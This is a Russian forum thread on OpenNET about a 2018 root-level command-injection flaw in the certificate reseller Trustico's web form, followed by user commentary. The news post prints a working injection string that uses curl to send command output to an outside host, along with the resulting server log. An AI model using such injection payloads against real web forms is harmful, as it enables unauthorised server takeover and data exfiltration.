The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от opennews (??) on 02-Мрт-18, 09:18 
Вчерашняя история (https://www.opennet.ru/opennews/art.shtml?num=48166) с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из пользователей сервиса обнаружил (https://twitter.com/cujanovic/status/969229397508153350) тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.


Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки  сертификата, то они будут исполнены на сервере с правами root.


Например, при вводе "$(curl http://1.2.3.4/`id`)" на указанный хост придёт запрос вида:


   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"


В настоящее время сайт Trustico (https://trustico.com) выведен из строя и недоступен. Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.


URL: https://www.reddit.com/r/sysadmin/comments/816t5f/trustico_w.../
Новость: https://www.opennet.ru/opennews/art.shtml?num=48176

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +30 +/
Сообщение от Аноним (??) on 02-Мрт-18, 09:18 
Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

23. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –1 +/
Сообщение от user (??) on 02-Мрт-18, 12:27 
Из аргентинской муки нужно делать блины на лопате.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 09:19 
"Гори-гори ясно, чтобы не погасло!"
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 09:24 
> "Гори-гори ясно, чтобы не погасло!"

Earth, Wind & Fire - Boogie Wonderland
Scooter - Fire

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

22. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:21 
The roof
The roof
The roof is on fire
We don't need no water
Let the motherfucker burn
Burn, motherfucker, burn(C)
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 09:22 
урок коррупционерам
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 10:15 
я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

18. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 11:07 
разумеется, на пути жадности нет преград
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

44. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –5 +/
Сообщение от Michael Shigorin email(ok) on 03-Мрт-18, 10:52 
> урок коррупционерам

Это Вы про тот почтовый сервер Хиллари?

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

47. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:28 
Всем кто смеет хреново работать и раздолбайствовать.
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

54. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Dmitry77 (ok) on 04-Мрт-18, 00:35 
Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это  заплатка которая плохо держится.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

48. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:42 
Нет, про получателей отката от комода за переход к ним с дигисерта. Такое впечатление, что их в яслях или в школе врать не научили, и они наивно полагали, что просто так можно краденные серты предъявить.
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

4. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +2 +/
Сообщение от A.Stahl (ok) on 02-Мрт-18, 09:23 
Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от commiethebeastie (ok) on 02-Мрт-18, 09:25 
>http://1.2.3.4/`id`

CVSS 11?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 09:26 
Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как хорошие разработчики это ленивые, нетерпеливые, с завышенным самомнением, персонажи, то остаются только студенты и индусы.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +5 +/
Сообщение от angra (ok) on 02-Мрт-18, 10:34 
>Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные

А деньги есть только на студентов и индусов, так как почти все средства уходят на бонусы манагеров.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

34. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 18:42 
Так снесите Бастилию )
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

17. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 11:04 
> внимательные, трудолюбивые и скромные

послушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие ведут к убыткам

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

24. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:32 
> внимание и трудолюбие ведут к убыткам

В стартапах, да. В энтерпрайзе наоборот.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

27. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 13:05 
проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего дохода.
как итог постепенно вся кропотливая работа сваливается на наиболее адекватного в условном отделе, а в какой-то момент он либо устаёт, либо просто уходит...
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

9. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 09:28 
Уволенный из Equifax администратор, перешёл на работу в Trustico?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –3 +/
Сообщение от нах on 02-Мрт-18, 09:52 
уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на ногах, один в жопе, проблема в том, что их в той деревне пол-миллиона, и треть уехали в Штаты по очень мягким визовым правилам. (вторая треть уехала в Европы с ближними Азиями)
тапок не хватит.
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

45. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от mickvav on 03-Мрт-18, 11:18 
Вы так говорите, как будто чувак из мухосранска не мог админить оносайтик...
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

15. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 10:37 
> Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.

И не отреагируют, сколько мы ни будем ожидать.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

16. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 10:47 
При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

И мы конечно верим им на слово, да? Учитывая что во всем остальном они врали как сивый мерин и скрывали информацию до последнего.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

19. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +2 +/
Сообщение от Аноним (??) on 02-Мрт-18, 11:12 
> И мы конечно верим им на слово, да?

Я думаю, что эта фраза в конце новости подается просто для особого смака.

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

20. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 11:27 
в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали, что скомпрометированы с приемлимой задержкой в границах TTT(time to trust).
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

21. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +1 +/
Сообщение от Zlo (??) on 02-Мрт-18, 11:40 
Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:47 
Не думаю
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

26. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 12:57 
А сам letsencrypt можно рассматривать как монокультуру...
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

49. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 13:44 
> Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач
> у всех остальных сертификаторов......прям совпадение.....

Это не совпадение, а следствие: комод теряет доход и пытается подмять остатки бизнеса на платных сертификатах.

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

28. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –1 +/
Сообщение от Дуплик (ok) on 02-Мрт-18, 13:40 
Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +1 +/
Сообщение от Дудосер on 02-Мрт-18, 14:15 
А за щеку откладывать можно будет?
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

30. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –1 +/
Сообщение от Некто (??) on 02-Мрт-18, 14:16 
> Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.

Ага! И все браузеры, использующие "HTTPSSS на блокчейне", в свободное время будут майнить не Monero, а подписи к транзакциям в этом блокчейне. Правильно! К чему столько вычислительной мощности CPU простаивает!

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

31. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от ананас on 02-Мрт-18, 14:27 
Да и ещё выкачивать уже подписанные сертификаты чтобы проверять локально
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

35. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Диалектик on 02-Мрт-18, 18:58 
Зачем самостоятельно что-то майнить? Вон возьми тот же блокчейн namecoin и используй нахаляву.
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

41. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 08:11 
но ведь namecoin уже есть.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

32. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +3 +/
Сообщение от mumu (ok) on 02-Мрт-18, 16:54 
> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.

#$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной школы имеет под собой серьёзные аргументы.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

33. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +3 +/
Сообщение от Некто (??) on 02-Мрт-18, 17:10 
>> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.
> #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной
> школы имеет под собой серьёзные аргументы.

А еще "... они будут исполнены на сервере с правами root", что однозначно указывает, что их веб сервер работал под рутом!

Запрет на пользование интернетом до окончания начальной школы от таких уродов не спасет. Нужна юридическая норма на пожизненный запрет пользования компьютером.

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

36. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 19:23 
если форенсик сможет с убедительной вероятностью указать на конкретное лицо, с которым не будет некоторого рода проблем. а уж запрет пользования..
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

37. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +2 +/
Сообщение от кек on 02-Мрт-18, 21:31 
>Суть  выявленной уязвимости в передаче пользовательского ввода в обработчик на  shell без экранирования спецсимволов

шел 2018 год...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

38. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  –2 +/
Сообщение от Аноним (??) on 02-Мрт-18, 22:23 
Где то видел статью о том что дешевле быть взломанным чем тратить деньги на грамотных специалистов. Такова селяви
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

39. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 23:10 
Дешевле не значит выгоднее.
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

40. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +2 +/
Сообщение от Аноним (??) on 03-Мрт-18, 00:17 
Еще дешевле вообще не заморачиваться с сайтами, не делать их вообще. Расходов ровно 0. Заодно и не сломают.
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

42. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Ordu email(ok) on 03-Мрт-18, 08:45 
Поэтому сейчас в США даже республиканцы задумываются о том, что сфера IT требует большего регулирования со стороны государства. Чтобы быть взломанным было бы дороже.
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

43. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 09:36 
никто не застрахован от ошибок, можно учиться жить без компьютера, пока регулятор не утянул всех под лёд
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

53. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 18:07 
непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

46. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Тот_Самый_Анонимус on 03-Мрт-18, 11:41 
В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

52. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Kuromi (ok) on 03-Мрт-18, 17:42 
А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.
Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

55. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Kuromi (ok) on 05-Мрт-18, 06:05 
> А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов
> от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация
> не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка
> - в мае.
> Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов
> на затронутых сайтах, наконец-то.

И, само смешное, спустя пару дней включили назад.

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

56. "Ожидается отзыв всех остальных сертификатов Trustico из-за п..."  +/
Сообщение от Аноним (??) on 06-Мрт-18, 03:23 
Прекрасно! Находил такие дыры лет 12 назад много где, но не думал, что такое до сих пор встречается в чем-то серьезнее курсовых работ. :)

Самое удивительное, что сэкономили на разработчиках те, у кого вообще затрат на ведение бизнеса почти по нулям - даже не продажа, а перепродажа воздуха. Жадность человеческая не имеет предела.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру